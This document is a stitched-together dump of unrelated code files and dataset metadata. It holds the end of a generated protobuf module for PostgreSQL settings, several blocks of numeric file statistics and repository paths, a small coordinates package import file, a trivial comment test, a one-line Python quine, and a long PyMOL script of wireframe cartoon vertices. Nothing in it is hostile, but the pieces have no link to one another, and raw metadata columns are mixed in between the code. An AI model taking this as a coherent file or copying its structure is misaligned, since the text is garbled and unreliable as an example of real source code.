_POSTGRESQLCONFIG14.fields_by_name['max_parallel_maintenance_workers']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_transaction_sample_rate']._options = None
_POSTGRESQLCONFIG14.fields_by_name['effective_io_concurrency']._options = None
_POSTGRESQLCONFIG14.fields_by_name['effective_cache_size']._options = None
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_log_min_duration']._options = None
_POSTGRESQLCONFIG14.fields_by_name['auto_explain_sample_rate']._options = None
_POSTGRESQLCONFIG14.fields_by_name['hash_mem_multiplier']._options = None
_POSTGRESQLCONFIG14.fields_by_name['logical_decoding_work_mem']._options = None
_POSTGRESQLCONFIG14.fields_by_name['maintenance_io_concurrency']._options = None
_POSTGRESQLCONFIG14.fields_by_name['max_slot_wal_keep_size']._options = None
_POSTGRESQLCONFIG14.fields_by_name['wal_keep_size']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_insert_threshold']._options = None
_POSTGRESQLCONFIG14.fields_by_name['autovacuum_vacuum_insert_scale_factor']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_min_duration_sample']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_statement_sample_rate']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_parameter_max_length']._options = None
_POSTGRESQLCONFIG14.fields_by_name['log_parameter_max_length_on_error']._options = None
_POSTGRESQLCONFIG14.fields_by_name['client_connection_check_interval']._options = None
_POSTGRESQLCONFIG14.fields_by_name['vacuum_failsafe_age']._options = None
_POSTGRESQLCONFIG14.fields_by_name['vacuum_multixact_failsafe_age']._options = None
# @@protoc_insertion_point(module_scope)
| 70.430585
| 18,755
| 0.80003
| 17,768
| 134,945
| 5.695801
| 0.046038
| 0.04158
| 0.081668
| 0.062696
| 0.832159
| 0.813751
| 0.802407
| 0.790243
| 0.760481
| 0.724445
| 0
| 0.060528
| 0.094883
| 134,945
| 1,915
| 18,756
| 70.467363
| 0.768047
| 0.003275
| 0
| 0.614072
| 1
| 0.001599
| 0.265594
| 0.236841
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003198
| 0
| 0.003198
| 0.001599
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ffcdeb5a8723b51b7f2b87ea504bcd6df4d94287
| 250
|
py
|
Python
|
africanus/coordinates/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 13
|
2018-04-06T09:36:13.000Z
|
2021-04-13T13:11:00.000Z
|
africanus/coordinates/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 153
|
2018-03-28T14:13:48.000Z
|
2022-02-03T07:49:17.000Z
|
africanus/coordinates/__init__.py
|
JoshVStaden/codex-africanus
|
4a38994431d51510b1749fa0e4b8b6190b8b530f
|
[
"BSD-3-Clause"
] | 14
|
2018-03-29T13:30:52.000Z
|
2021-06-12T02:56:55.000Z
|
# flake8: noqa
from africanus.coordinates.coordinates import radec_to_lmn
from africanus.coordinates.coordinates import radec_to_lm
from africanus.coordinates.coordinates import lmn_to_radec
from africanus.coordinates.coordinates import lm_to_radec
| 35.714286
| 58
| 0.88
| 34
| 250
| 6.235294
| 0.294118
| 0.245283
| 0.45283
| 0.660377
| 0.839623
| 0.45283
| 0.45283
| 0
| 0
| 0
| 0
| 0.004348
| 0.08
| 250
| 6
| 59
| 41.666667
| 0.917391
| 0.048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ffcfd5d7cc8ba6863f96220d3693bb54eb89d208
| 79
|
py
|
Python
|
tests/parser/good/simple-comment.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | 1
|
2020-11-24T05:24:26.000Z
|
2020-11-24T05:24:26.000Z
|
tests/parser/good/simple-comment.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | null | null | null |
tests/parser/good/simple-comment.py
|
Nakrez/RePy
|
057db55a99eac2c5cb3d622fa1f2e29f6083d8d6
|
[
"MIT"
] | null | null | null |
# function my_fun
def myfun():
# return 1
return 1
# call myfun
myfun()
| 9.875
| 17
| 0.632911
| 12
| 79
| 4.083333
| 0.666667
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.034483
| 0.265823
| 79
| 7
| 18
| 11.285714
| 0.810345
| 0.443038
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
0808adf9323664303df19a9f8cecc9fd04f8491a
| 32
|
py
|
Python
|
archive/p/python/quine.py
|
Ayush7-BIT/sample-programs
|
827d8961d3a548daf8fe3b674642a1562daaa5c4
|
[
"MIT"
] | 422
|
2018-08-14T11:57:47.000Z
|
2022-03-07T23:54:34.000Z
|
archive/p/python/quine.py
|
Ayush7-BIT/sample-programs
|
827d8961d3a548daf8fe3b674642a1562daaa5c4
|
[
"MIT"
] | 1,498
|
2018-08-10T19:18:52.000Z
|
2021-12-14T03:02:00.000Z
|
archive/p/python/quine.py
|
Ayush7-BIT/sample-programs
|
827d8961d3a548daf8fe3b674642a1562daaa5c4
|
[
"MIT"
] | 713
|
2018-08-12T21:37:49.000Z
|
2022-03-02T22:57:21.000Z
|
s='s=%r;print(s%%s)';print(s%s)
| 16
| 31
| 0.53125
| 9
| 32
| 1.888889
| 0.333333
| 0.352941
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 32
| 1
| 32
| 32
| 0.548387
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
082961edc364e6db346940f7196ee9f5e98dbefd
| 304,733
|
py
|
Python
|
tests/jobs_output/self_scripting/cgo_cartoon_wf.py
|
kliment-olechnovic/voronota
|
4e3063aa86b44f1f2e7b088ec9976f3e12047549
|
[
"MIT"
] | 9
|
2019-08-23T10:46:18.000Z
|
2022-03-11T12:20:27.000Z
|
tests/jobs_output/self_scripting/cgo_cartoon_wf.py
|
kliment-olechnovic/voronota
|
4e3063aa86b44f1f2e7b088ec9976f3e12047549
|
[
"MIT"
] | null | null | null |
tests/jobs_output/self_scripting/cgo_cartoon_wf.py
|
kliment-olechnovic/voronota
|
4e3063aa86b44f1f2e7b088ec9976f3e12047549
|
[
"MIT"
] | 3
|
2020-09-17T19:07:47.000Z
|
2021-04-29T01:19:38.000Z
|
from pymol.cgo import *
from pymol import cmd
cartoon_wf = [COLOR, 0.000, 0.757, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 22.191, 22.736, 28.234,
VERTEX, 22.021, 22.906, 28.175,
VERTEX, 22.654, 23.202, 28.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.021, 22.906, 28.175,
VERTEX, 22.654, 23.202, 28.107,
VERTEX, 22.489, 23.366, 28.043,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.654, 23.202, 28.107,
VERTEX, 22.489, 23.366, 28.043,
VERTEX, 23.289, 23.748, 27.729,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.489, 23.366, 28.043,
VERTEX, 23.289, 23.748, 27.729,
VERTEX, 23.124, 23.906, 27.657,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.289, 23.748, 27.729,
VERTEX, 23.124, 23.906, 27.657,
VERTEX, 23.723, 24.054, 27.321,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.124, 23.906, 27.657,
VERTEX, 23.723, 24.054, 27.321,
VERTEX, 23.552, 24.210, 27.242,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.723, 24.054, 27.321,
VERTEX, 23.552, 24.210, 27.242,
VERTEX, 23.702, 23.940, 27.123,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.552, 24.210, 27.242,
VERTEX, 23.702, 23.940, 27.123,
VERTEX, 23.524, 24.101, 27.042,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.702, 23.940, 27.123,
VERTEX, 23.524, 24.101, 27.042,
VERTEX, 23.239, 23.474, 27.250,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.524, 24.101, 27.042,
VERTEX, 23.239, 23.474, 27.250,
VERTEX, 23.055, 23.641, 27.174,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.239, 23.474, 27.250,
VERTEX, 23.055, 23.641, 27.174,
VERTEX, 22.604, 22.929, 27.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.055, 23.641, 27.174,
VERTEX, 22.604, 22.929, 27.628,
VERTEX, 22.421, 23.101, 27.561,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.604, 22.929, 27.628,
VERTEX, 22.421, 23.101, 27.561,
VERTEX, 22.170, 22.623, 28.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.421, 23.101, 27.561,
VERTEX, 22.170, 22.623, 28.036,
VERTEX, 21.992, 22.797, 27.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.170, 22.623, 28.036,
VERTEX, 21.992, 22.797, 27.976,
VERTEX, 22.191, 22.736, 28.234,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.992, 22.797, 27.976,
VERTEX, 22.191, 22.736, 28.234,
VERTEX, 22.021, 22.906, 28.175,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.021, 22.906, 28.175,
VERTEX, 21.833, 23.097, 28.118,
VERTEX, 22.489, 23.366, 28.043,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.833, 23.097, 28.118,
VERTEX, 22.489, 23.366, 28.043,
VERTEX, 22.305, 23.551, 27.979,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.489, 23.366, 28.043,
VERTEX, 22.305, 23.551, 27.979,
VERTEX, 23.124, 23.906, 27.657,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.305, 23.551, 27.979,
VERTEX, 23.124, 23.906, 27.657,
VERTEX, 22.938, 24.085, 27.582,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.124, 23.906, 27.657,
VERTEX, 22.938, 24.085, 27.582,
VERTEX, 23.552, 24.210, 27.242,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.938, 24.085, 27.582,
VERTEX, 23.552, 24.210, 27.242,
VERTEX, 23.362, 24.385, 27.160,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.552, 24.210, 27.242,
VERTEX, 23.362, 24.385, 27.160,
VERTEX, 23.524, 24.101, 27.042,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.362, 24.385, 27.160,
VERTEX, 23.524, 24.101, 27.042,
VERTEX, 23.329, 24.277, 26.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.524, 24.101, 27.042,
VERTEX, 23.329, 24.277, 26.961,
VERTEX, 23.055, 23.641, 27.174,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.329, 24.277, 26.961,
VERTEX, 23.055, 23.641, 27.174,
VERTEX, 22.857, 23.823, 27.100,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.055, 23.641, 27.174,
VERTEX, 22.857, 23.823, 27.100,
VERTEX, 22.421, 23.101, 27.561,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.857, 23.823, 27.100,
VERTEX, 22.421, 23.101, 27.561,
VERTEX, 22.224, 23.289, 27.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.421, 23.101, 27.561,
VERTEX, 22.224, 23.289, 27.497,
VERTEX, 21.992, 22.797, 27.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.224, 23.289, 27.497,
VERTEX, 21.992, 22.797, 27.976,
VERTEX, 21.799, 22.988, 27.919,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.992, 22.797, 27.976,
VERTEX, 21.799, 22.988, 27.919,
VERTEX, 22.021, 22.906, 28.175,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.799, 22.988, 27.919,
VERTEX, 22.021, 22.906, 28.175,
VERTEX, 21.833, 23.097, 28.118,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.833, 23.097, 28.118,
VERTEX, 21.610, 23.321, 28.056,
VERTEX, 22.305, 23.551, 27.979,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.610, 23.321, 28.056,
VERTEX, 22.305, 23.551, 27.979,
VERTEX, 22.083, 23.771, 27.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.305, 23.551, 27.979,
VERTEX, 22.083, 23.771, 27.907,
VERTEX, 22.938, 24.085, 27.582,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.083, 23.771, 27.907,
VERTEX, 22.938, 24.085, 27.582,
VERTEX, 22.715, 24.297, 27.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.938, 24.085, 27.582,
VERTEX, 22.715, 24.297, 27.497,
VERTEX, 23.362, 24.385, 27.160,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.715, 24.297, 27.497,
VERTEX, 23.362, 24.385, 27.160,
VERTEX, 23.136, 24.591, 27.068,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.362, 24.385, 27.160,
VERTEX, 23.136, 24.591, 27.068,
VERTEX, 23.329, 24.277, 26.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.136, 24.591, 27.068,
VERTEX, 23.329, 24.277, 26.961,
VERTEX, 23.099, 24.481, 26.870,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.329, 24.277, 26.961,
VERTEX, 23.099, 24.481, 26.870,
VERTEX, 22.857, 23.823, 27.100,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.099, 24.481, 26.870,
VERTEX, 22.857, 23.823, 27.100,
VERTEX, 22.626, 24.031, 27.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.857, 23.823, 27.100,
VERTEX, 22.626, 24.031, 27.019,
VERTEX, 22.224, 23.289, 27.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.626, 24.031, 27.019,
VERTEX, 22.224, 23.289, 27.497,
VERTEX, 21.994, 23.506, 27.429,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.224, 23.289, 27.497,
VERTEX, 21.994, 23.506, 27.429,
VERTEX, 21.799, 22.988, 27.919,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.994, 23.506, 27.429,
VERTEX, 21.799, 22.988, 27.919,
VERTEX, 21.574, 23.211, 27.858,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.799, 22.988, 27.919,
VERTEX, 21.574, 23.211, 27.858,
VERTEX, 21.833, 23.097, 28.118,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.574, 23.211, 27.858,
VERTEX, 21.833, 23.097, 28.118,
VERTEX, 21.610, 23.321, 28.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.610, 23.321, 28.056,
VERTEX, 21.336, 23.594, 27.982,
VERTEX, 22.083, 23.771, 27.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.336, 23.594, 27.982,
VERTEX, 22.083, 23.771, 27.907,
VERTEX, 21.809, 24.039, 27.819,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.083, 23.771, 27.907,
VERTEX, 21.809, 24.039, 27.819,
VERTEX, 22.715, 24.297, 27.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.809, 24.039, 27.819,
VERTEX, 22.715, 24.297, 27.497,
VERTEX, 22.438, 24.555, 27.394,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.715, 24.297, 27.497,
VERTEX, 22.438, 24.555, 27.394,
VERTEX, 23.136, 24.591, 27.068,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.438, 24.555, 27.394,
VERTEX, 23.136, 24.591, 27.068,
VERTEX, 22.856, 24.840, 26.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.136, 24.591, 27.068,
VERTEX, 22.856, 24.840, 26.955,
VERTEX, 23.099, 24.481, 26.870,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.856, 24.840, 26.955,
VERTEX, 23.099, 24.481, 26.870,
VERTEX, 22.817, 24.726, 26.759,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.099, 24.481, 26.870,
VERTEX, 22.817, 24.726, 26.759,
VERTEX, 22.626, 24.031, 27.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.817, 24.726, 26.759,
VERTEX, 22.626, 24.031, 27.019,
VERTEX, 22.344, 24.281, 26.922,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.626, 24.031, 27.019,
VERTEX, 22.344, 24.281, 26.922,
VERTEX, 21.994, 23.506, 27.429,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.344, 24.281, 26.922,
VERTEX, 21.994, 23.506, 27.429,
VERTEX, 21.715, 23.765, 27.347,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.994, 23.506, 27.429,
VERTEX, 21.715, 23.765, 27.347,
VERTEX, 21.574, 23.211, 27.858,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.715, 23.765, 27.347,
VERTEX, 21.574, 23.211, 27.858,
VERTEX, 21.297, 23.480, 27.786,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.574, 23.211, 27.858,
VERTEX, 21.297, 23.480, 27.786,
VERTEX, 21.610, 23.321, 28.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.297, 23.480, 27.786,
VERTEX, 21.610, 23.321, 28.056,
VERTEX, 21.336, 23.594, 27.982,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.336, 23.594, 27.982,
VERTEX, 20.993, 23.927, 27.887,
VERTEX, 21.809, 24.039, 27.819,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.993, 23.927, 27.887,
VERTEX, 21.809, 24.039, 27.819,
VERTEX, 21.466, 24.366, 27.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.809, 24.039, 27.819,
VERTEX, 21.466, 24.366, 27.708,
VERTEX, 22.438, 24.555, 27.394,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.466, 24.366, 27.708,
VERTEX, 22.438, 24.555, 27.394,
VERTEX, 22.092, 24.870, 27.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.438, 24.555, 27.394,
VERTEX, 22.092, 24.870, 27.264,
VERTEX, 22.856, 24.840, 26.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.092, 24.870, 27.264,
VERTEX, 22.856, 24.840, 26.955,
VERTEX, 22.504, 25.143, 26.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.856, 24.840, 26.955,
VERTEX, 22.504, 25.143, 26.813,
VERTEX, 22.817, 24.726, 26.759,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.504, 25.143, 26.813,
VERTEX, 22.817, 24.726, 26.759,
VERTEX, 22.462, 25.026, 26.620,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.817, 24.726, 26.759,
VERTEX, 22.462, 25.026, 26.620,
VERTEX, 22.344, 24.281, 26.922,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.462, 25.026, 26.620,
VERTEX, 22.344, 24.281, 26.922,
VERTEX, 21.990, 24.586, 26.799,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.344, 24.281, 26.922,
VERTEX, 21.990, 24.586, 26.799,
VERTEX, 21.715, 23.765, 27.347,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.990, 24.586, 26.799,
VERTEX, 21.715, 23.765, 27.347,
VERTEX, 21.364, 24.082, 27.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.715, 23.765, 27.347,
VERTEX, 21.364, 24.082, 27.243,
VERTEX, 21.297, 23.480, 27.786,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.364, 24.082, 27.243,
VERTEX, 21.297, 23.480, 27.786,
VERTEX, 20.951, 23.809, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.297, 23.480, 27.786,
VERTEX, 20.951, 23.809, 27.694,
VERTEX, 21.336, 23.594, 27.982,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.951, 23.809, 27.694,
VERTEX, 21.336, 23.594, 27.982,
VERTEX, 20.993, 23.927, 27.887,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.993, 23.927, 27.887,
VERTEX, 20.653, 24.256, 27.794,
VERTEX, 21.466, 24.366, 27.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.653, 24.256, 27.794,
VERTEX, 21.466, 24.366, 27.708,
VERTEX, 21.126, 24.688, 27.600,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.466, 24.366, 27.708,
VERTEX, 21.126, 24.688, 27.600,
VERTEX, 22.092, 24.870, 27.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.126, 24.688, 27.600,
VERTEX, 22.092, 24.870, 27.264,
VERTEX, 21.748, 25.179, 27.136,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.092, 24.870, 27.264,
VERTEX, 21.748, 25.179, 27.136,
VERTEX, 22.504, 25.143, 26.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.748, 25.179, 27.136,
VERTEX, 22.504, 25.143, 26.813,
VERTEX, 22.155, 25.442, 26.674,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.504, 25.143, 26.813,
VERTEX, 22.155, 25.442, 26.674,
VERTEX, 22.462, 25.026, 26.620,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.155, 25.442, 26.674,
VERTEX, 22.462, 25.026, 26.620,
VERTEX, 22.107, 25.322, 26.483,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.462, 25.026, 26.620,
VERTEX, 22.107, 25.322, 26.483,
VERTEX, 21.990, 24.586, 26.799,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.107, 25.322, 26.483,
VERTEX, 21.990, 24.586, 26.799,
VERTEX, 21.634, 24.891, 26.677,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.990, 24.586, 26.799,
VERTEX, 21.634, 24.891, 26.677,
VERTEX, 21.364, 24.082, 27.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.634, 24.891, 26.677,
VERTEX, 21.364, 24.082, 27.243,
VERTEX, 21.012, 24.399, 27.141,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.364, 24.082, 27.243,
VERTEX, 21.012, 24.399, 27.141,
VERTEX, 20.951, 23.809, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.012, 24.399, 27.141,
VERTEX, 20.951, 23.809, 27.694,
VERTEX, 20.605, 24.137, 27.604,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.951, 23.809, 27.694,
VERTEX, 20.605, 24.137, 27.604,
VERTEX, 20.993, 23.927, 27.887,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.605, 24.137, 27.604,
VERTEX, 20.993, 23.927, 27.887,
VERTEX, 20.653, 24.256, 27.794,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.653, 24.256, 27.794,
VERTEX, 20.384, 24.521, 27.727,
VERTEX, 21.126, 24.688, 27.600,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.384, 24.521, 27.727,
VERTEX, 21.126, 24.688, 27.600,
VERTEX, 20.859, 24.944, 27.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.126, 24.688, 27.600,
VERTEX, 20.859, 24.944, 27.522,
VERTEX, 21.748, 25.179, 27.136,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.859, 24.944, 27.522,
VERTEX, 21.748, 25.179, 27.136,
VERTEX, 21.478, 25.424, 27.042,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.748, 25.179, 27.136,
VERTEX, 21.478, 25.424, 27.042,
VERTEX, 22.155, 25.442, 26.674,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.478, 25.424, 27.042,
VERTEX, 22.155, 25.442, 26.674,
VERTEX, 21.878, 25.679, 26.569,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.155, 25.442, 26.674,
VERTEX, 21.878, 25.679, 26.569,
VERTEX, 22.107, 25.322, 26.483,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.878, 25.679, 26.569,
VERTEX, 22.107, 25.322, 26.483,
VERTEX, 21.824, 25.560, 26.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.107, 25.322, 26.483,
VERTEX, 21.824, 25.560, 26.380,
VERTEX, 21.634, 24.891, 26.677,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.824, 25.560, 26.380,
VERTEX, 21.634, 24.891, 26.677,
VERTEX, 21.348, 25.137, 26.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.634, 24.891, 26.677,
VERTEX, 21.348, 25.137, 26.586,
VERTEX, 21.012, 24.399, 27.141,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.348, 25.137, 26.586,
VERTEX, 21.012, 24.399, 27.141,
VERTEX, 20.729, 24.657, 27.066,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.012, 24.399, 27.141,
VERTEX, 20.729, 24.657, 27.066,
VERTEX, 20.605, 24.137, 27.604,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.729, 24.657, 27.066,
VERTEX, 20.605, 24.137, 27.604,
VERTEX, 20.330, 24.402, 27.539,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.605, 24.137, 27.604,
VERTEX, 20.330, 24.402, 27.539,
VERTEX, 20.653, 24.256, 27.794,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.330, 24.402, 27.539,
VERTEX, 20.653, 24.256, 27.794,
VERTEX, 20.384, 24.521, 27.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.384, 24.521, 27.727,
VERTEX, 20.168, 24.737, 27.682,
VERTEX, 20.859, 24.944, 27.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.168, 24.737, 27.682,
VERTEX, 20.859, 24.944, 27.522,
VERTEX, 20.646, 25.152, 27.466,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.859, 24.944, 27.522,
VERTEX, 20.646, 25.152, 27.466,
VERTEX, 21.478, 25.424, 27.042,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.646, 25.152, 27.466,
VERTEX, 21.478, 25.424, 27.042,
VERTEX, 21.262, 25.622, 26.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.478, 25.424, 27.042,
VERTEX, 21.262, 25.622, 26.973,
VERTEX, 21.878, 25.679, 26.569,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.262, 25.622, 26.973,
VERTEX, 21.878, 25.679, 26.569,
VERTEX, 21.655, 25.872, 26.491,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.878, 25.679, 26.569,
VERTEX, 21.655, 25.872, 26.491,
VERTEX, 21.824, 25.560, 26.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.655, 25.872, 26.491,
VERTEX, 21.824, 25.560, 26.380,
VERTEX, 21.594, 25.754, 26.304,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.824, 25.560, 26.380,
VERTEX, 21.594, 25.754, 26.304,
VERTEX, 21.348, 25.137, 26.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.594, 25.754, 26.304,
VERTEX, 21.348, 25.137, 26.586,
VERTEX, 21.116, 25.339, 26.519,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.348, 25.137, 26.586,
VERTEX, 21.116, 25.339, 26.519,
VERTEX, 20.729, 24.657, 27.066,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.116, 25.339, 26.519,
VERTEX, 20.729, 24.657, 27.066,
VERTEX, 20.500, 24.869, 27.012,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.729, 24.657, 27.066,
VERTEX, 20.500, 24.869, 27.012,
VERTEX, 20.330, 24.402, 27.539,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.500, 24.869, 27.012,
VERTEX, 20.330, 24.402, 27.539,
VERTEX, 20.107, 24.619, 27.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.330, 24.402, 27.539,
VERTEX, 20.107, 24.619, 27.494,
VERTEX, 20.384, 24.521, 27.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.107, 24.619, 27.494,
VERTEX, 20.384, 24.521, 27.727,
VERTEX, 20.168, 24.737, 27.682,
END,
